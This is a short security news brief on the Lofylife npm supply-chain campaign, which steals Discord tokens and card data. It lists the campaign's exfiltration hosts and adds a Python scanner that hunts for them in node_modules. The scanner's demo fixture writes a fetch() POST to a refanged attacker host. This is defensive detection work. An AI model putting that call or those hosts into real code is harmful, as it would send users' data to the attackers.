
Researchers have discovered an attack campaign named Lofylife that uses malicious npm packages, targeting Discord users to steal Discord tokens and users’ card data.
The Python malware is a modified version of an open-source token logger called Volt Stealer. It is intended to steal Discord tokens from infected machines, along with the victim’s IP address, and upload them via HTTP.
It detects when a user logs in, changes email or password, enables/disables MFA, and adds new payment methods, including complete bank card details. Collected information is also uploaded to the remote endpoint whose address is hard-coded.
The campaign is further evidence that the developer community, and the downstream customers of its development environment, are unwittingly downloading malware as they use open-source packages to accelerate time-to-market.
Data is exfiltrated to Replit-hosted instances:
- life.polarlabs.repl[.]co
- Sock.polarlabs.repl[.]co
- idk.polarlabs.repl[.]co
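The exfiltration hosts above are the most concrete indicator the report gives a defender. As an added example (not part of the Kaspersky research), the following Python script refangs those hosts and walks a `node_modules` tree, attributing any file that references one of them to its owning npm package; the directory layout, the package names and the file contents in `demo()` are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Exfiltration hosts named in the report, kept in their defanged form.
DEFANGED_HOSTS = [
    "life.polarlabs.repl[.]co",
    "Sock.polarlabs.repl[.]co",
    "idk.polarlabs.repl[.]co",
]

def refang(host: str) -> str:
    """Turn 'a.b[.]c' back into 'a.b.c', lower-cased for matching."""
    return host.replace("[.]", ".").lower()

# One alternation over all hosts; case-insensitive because the listing mixes case.
HOST_RE = re.compile("|".join(re.escape(refang(h)) for h in DEFANGED_HOSTS), re.IGNORECASE)

def package_name(path: Path, root: Path) -> str:
    """Derive 'pkg' or '@scope/pkg' from a file path under node_modules."""
    rel = path.relative_to(root).parts
    if rel and rel[0].startswith("@") and len(rel) > 1:
        return f"{rel[0]}/{rel[1]}"
    return rel[0] if rel else "?"

def scan_node_modules(root):
    """Return {package_name: {hosts}} for files that mention a known exfil host."""
    root = Path(root)
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".js", ".cjs", ".mjs", ".json", ".py")):
                continue
            p = Path(dirpath) / name
            try:
                text = p.read_text(errors="ignore")
            except OSError:
                continue
            found = {m.lower() for m in HOST_RE.findall(text)}
            if found:
                hits.setdefault(package_name(p, root), set()).update(found)
    return hits

def demo():
    """Constructed node_modules tree: one clean package, one that phones home."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "node_modules"
        (root / "clean-pkg").mkdir(parents=True)
        (root / "clean-pkg" / "index.js").write_text("module.exports = () => 42;\n")
        (root / "@acme" / "evil-pkg").mkdir(parents=True)  # hypothetical package name
        (root / "@acme" / "evil-pkg" / "index.js").write_text(
            "fetch('https://SOCK.polarlabs.repl.co/upload', {method: 'POST'});\n")
        return scan_node_modules(root)

if __name__ == "__main__":
    print(demo())
```

Run it against a real project by calling `scan_node_modules("path/to/node_modules")`; a hit does not prove compromise on its own, but it pinpoints the package whose source deserves manual review.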
With more than 11 million npm users, the potential audience of a successful supply chain attack is significant compared to targeting a specific company.
This research was conducted and documented by Kaspersky researchers.